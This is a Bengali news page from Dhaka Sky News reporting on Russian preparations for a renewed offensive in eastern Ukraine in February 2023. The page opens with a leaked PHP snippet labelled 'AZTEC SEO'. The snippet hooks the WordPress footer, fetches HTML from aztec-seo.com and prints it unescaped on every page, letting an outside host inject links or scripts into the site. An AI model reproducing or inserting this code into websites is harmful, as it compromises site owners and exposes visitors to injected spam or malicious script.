/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ইউক্রেনে ভয়াবহ হামলার প্রস্তুতি নিচ্ছে রাশিয়া | Dhaka Sky News

বরিশাল রেঞ্জের শ্রেষ্ঠ পুলিশ সুপার মো. সাইদুল ইসলাম

আগের সংবাদ

স্বামী হারানোর ‘শাস্তি’ পায় নাবালিকা বধূরা, চলে বেচাকেনা

পরের সংবাদ

ইউক্রেনে ভয়াবহ হামলার প্রস্তুতি নিচ্ছে রাশিয়া

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: February 10, 2023 , 10:26 am

ইউক্রেনের পূর্বাঞ্চলে আবার ভয়াবহ হামলার প্রস্তুতি নিচ্ছে রাশিয়া। ইউক্রেন কর্তৃপক্ষের বরাত দিয়ে রয়টার্স জানায়, পশ্চিমা কয়েকটি দেশ ইউক্রেনকে অত্যাধুনিক যুদ্ধবিমান দেওয়ার ঘোষণার পর রাশিয়া এ হামলার প্রস্তুতি নিচ্ছে। রুশ হামলা ঠেকাতে ইউরোপের বিভিন্ন দেশের কাছে যুদ্ধবিমান চেয়েছিলেন ইউক্রেনের প্রেসিডেন্ট ভলোদিমির জেলেনস্কি।

জেলেনস্কি শুক্রবার রাজধানী কিয়েভে ফিরে বলেন, বৃহস্পতিবার ব্রাসেলসে ইউরোপীয় নেতারা আমাকে আশ্বস্ত করেছেন— ইউক্রেনের বিমানবাহিনীকে শক্তিশালী করতে তারা অত্যাধুনিক যুদ্ধবিমান দেবেন।

ইউক্রেনে বিশেষ সেনা অভিযানের বর্ষপূর্তি হতে যাচ্ছে আগামী ২৪ ফেব্রুয়ারি। এ কারণে সম্প্রতি ইউক্রেনে হামলা আরও জোরদার করতে পারে রাশিয়া।

ইউক্রেনের পূর্বাঞ্চলীয় প্রদেশ দোনেৎস্কের গভর্নর পাভলো ক্রিলেংকো বৃহস্পতিবার এক টিভি সাক্ষাৎকারে বলেছেন, যে কোনো সময় রাশিয়া এ অঞ্চলটির দখল নিতে আবারও ভয়াবহ হামলা শুরু করতে পারে। গত ১০ দিন ধরে রুশ বাহিনী বিমান হামলা জোরদার করেছে। লুহানস্ক অঞ্চলেও ক্ষেপণাস্ত্র হামলা বৃদ্ধি করেছে রাশিয়া।